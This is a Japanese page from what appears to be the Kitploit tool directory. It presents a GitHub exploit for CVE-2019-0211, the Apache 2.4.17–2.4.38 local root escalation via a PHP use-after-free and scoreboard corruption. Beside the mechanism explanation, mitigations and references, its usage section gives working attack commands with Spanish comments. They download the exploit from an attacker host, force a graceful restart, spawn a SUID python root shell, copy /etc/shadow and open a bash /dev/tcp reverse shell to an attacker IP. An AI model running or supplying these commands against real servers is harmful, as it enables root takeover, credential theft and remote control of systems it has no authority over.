Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2019-0211-exploit — CVE-2019-0211を対象とした、mod_phpを使用するApache HTTP Server 2.4.17-2.4.38向けのローカル特権昇格エクスプロイト。PHPのUAFを利用してApacheのスコアボードを破壊し、graceful restartを介してrootとして任意のコマンドを実行します。 | Kitploit
ツール/GitHubGitHub/jeanback1/cve-2019-0211-exploit
特権昇格エクスプロイトフレームワーク脆弱性分析エクスプロイトウェブセキュリティペネトレーションテスト学習と教育ペイロード開発バイナリエクスプロイト

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有
GitHubjeanback1/cve-2019-0211-exploit

CVE-2019-0211-exploit

CVE-2019-0211を対象とした、mod_phpを使用するApache HTTP Server 2.4.17-2.4.38向けのローカル特権昇格エクスプロイト。PHPのUAFを利用してApacheのスコアボードを破壊し、graceful restartを介してrootとして任意のコマンドを実行します。

リポジトリを見る
2ヶ月前未レビュー

CVE-2019-0211 — Apache HTTP Server ローカル権限昇格 (CARPE DIEM)

説明

CVE-2019-0211 は、mod_prefork および mod_php (または PHP-FPM) を使用する Apache HTTP Server バージョン 2.4.17 から 2.4.38 に影響を与える ローカル権限昇格 の脆弱性です。

この脆弱性により、www-data シェルを持つ攻撃者が、PHP の Use-After-Free (UAF) と Apache の scoreboard の破損を組み合わせて root に昇格できます。Apache が graceful restart を実行するとき(例えば、logrotate による午前6時25分)、権限をドロップする前に child_init() を実行します。この関数へのポインタを破壊できれば、Apache に root として任意のコマンドを実行させることができます。

CVSS 3.1: 7.8 (高) — AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H


技術的詳細

フィールド値
CVECVE-2019-0211
製品Apache HTTP Server
影響を受けるバージョン2.4.17 – 2.4.38
タイプローカル権限昇格 (CWE-269)
必要条件www-data シェル、mod_php を使用する Apache、MPM prefork/worker/event
CVSS 3.17.8 高
パッチApache 2.4.39

メカニズム

Apache は scoreboard と呼ばれる共有メモリ領域を使用しており、各ワーカーチャイルドプロセスは prefork_child_bucket へのポインタ bucket を持つ構造体 process_score を持っています。このバケットには、関数ポインタ (meth->child_init()) を含む apr_proc_mutex_t が含まれています。

Apache が graceful restart (logrotate による午前6時25分の自然なトリガー) を実行すると、権限をドロップする 前に child_init() を呼び出します。エクスプロイトは以下の通りです:

  1. DateInterval オブジェクトと JSON シリアライゼーションを操作して PHP で UAF を引き起こす
  2. メモリ内で 任意読み取り/書き込み プリミティブを取得する
  3. /proc/self/maps を読み取り、scoreboard を特定する (SHM は /dev/zero)
  4. Apache のメモリ内で構造体 all_buckets を見つける
  5. バケットを上書きし、meth->child_init() を system() にリダイレクトするペイロードを設定する
  6. 次の再起動時に、Apache はペイロードを root として実行する

エクスプロイト

原作者

Charles Fol — @cfreal_

元のブログ記事: CARPE DIEM — CVE-2019-0211 Apache Local Root

必要条件

  • Apache HTTP Server 2.4.17 – 2.4.38 で mod_php (PHP 7.x) を使用
  • サーバー上の www-data シェル
  • Apache が提供するディレクトリに .php ファイルを書き込める能力

使用方法

root@kitploit:~
# 1. Subir el exploit al servidor vulnerable
# Desde tu máquina atacante:
python3 -m http.server 8080
# En el servidor (como www-data):
cd /var/www/html
wget http://TU_IP:8080/carpediem.php

# 2. Ejecutar el exploit
curl http://localhost/carpediem.php

# 3. Esperar a que Apache haga graceful restart
# Opción A) Esperar a las 6:25 AM (logrotate automático)
# Opción B) Forzar logrotate si tienes permisos:
sudo /usr/sbin/logrotate /etc/logrotate.conf --force

# 4. Verificar que python3.5 ahora es SUID root
ls -la /usr/bin/python3.5
# Output esperado: -rwsr-sr-x 2 root root ...

# 5. Escalar a root
python3.5 -c 'import os; os.setuid(0); os.system("/bin/bash")'

カスタムペイロード

cmd パラメータを使用して、root として実行するコマンドを変更できます:

root@kitploit:~
# Ejemplo: hacer una copia de /etc/shadow
curl "http://localhost/carpediem.php?cmd=cp+/etc/shadow+/tmp/"

# Ejemplo: reverse shell
curl "http://localhost/carpediem.php?cmd=bash+-c+'bash+-i+>%26+/dev/tcp/TU_IP/PUERTO+0>%261'"

成功率

ワーカー数

ワーカー数が多いほど成功率が高くなります。


緩和策

  • Apache HTTP Server をバージョン 2.4.39 以上 に更新する
  • MPM prefork から MPM event に移行する (scoreboard の攻撃対象領域を減らす)
  • hidef または AppArmor/SELinux を使用して /proc/self/maps へのアクセスを制限する

参考文献

  • NVD — CVE-2019-0211
  • CARPE DIEM Blogpost — Charles Fol
  • Exploit en GitHub — cfreal/exploits
  • Exploit-DB #46676
  • Apache Security Advisories
ツールをダウンロード
成功率
試行回数
失敗回数
5 (デフォルト)87%17726
889%608
1095%704